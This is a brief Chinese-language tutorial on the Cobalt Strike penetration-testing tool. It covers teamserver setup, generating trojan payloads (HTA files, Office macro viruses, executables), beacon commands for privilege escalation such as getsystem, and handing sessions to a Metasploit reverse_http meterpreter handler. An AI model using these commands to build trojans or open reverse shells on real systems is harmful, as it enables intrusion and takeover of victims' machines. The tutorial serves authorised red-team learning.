目录
简介
Cobalt Strike(简称为CS)是一款基于java的渗透测试工具(尤其是后渗透阶段),自3.0开始已经不再使用Metasploit框架而作为一个独立的平台使用,这款工具有其他很多渗透测试工具没有的团队合作功能,团队成员可以连接到同一个服务器上进行合作,共享攻击资源。
Cobalt Strike有端口转发、扫描、监听、生成各种木马、浏览器自动攻击等功能。
基本使用
服务端 ./teamserver 192.168.164.134 123456
客户端 ./start.sh
基本攻击流程
新建一个监听
listener
生成payload
HTML Application
基于HTML应用的payload模块,生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件
MS Office Macro
生成office宏病毒文件
Payload Generator
生成各种语言版本的payload,如C ,C#,COM Scriptlet,Java,Perl,Python,PowerShell,Ruby,VBA.......
Windows Executable
生成可执行exe木马
Windows Executable(Stageless)
生成无状态的可执行exe木马
使用木马
常用命令
help: 查看可用命令
getuid: 获取当前用户的权限
getsystem: 获取system权限
getprivs: 获取当前beacon里面的所有权限(这个用户现在能干嘛)
net domain_trusts: 列出域之间的信任关系
net logons:查看现在在登录的用户
net share:查看共享
shell xxx: 在命令行中执行xxx命令
powerpick xxx:不通过powershell来执行命令
cs与msf联动
打开msf,启动handler监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost xxxxxx (本机ip)
set lport xxxx
exploit
CS新建一个外部监听
new listener
name msf
payload foregin http
host 与msf设置一致
port 与msf设置一致
在cs控制台输入
spawn msf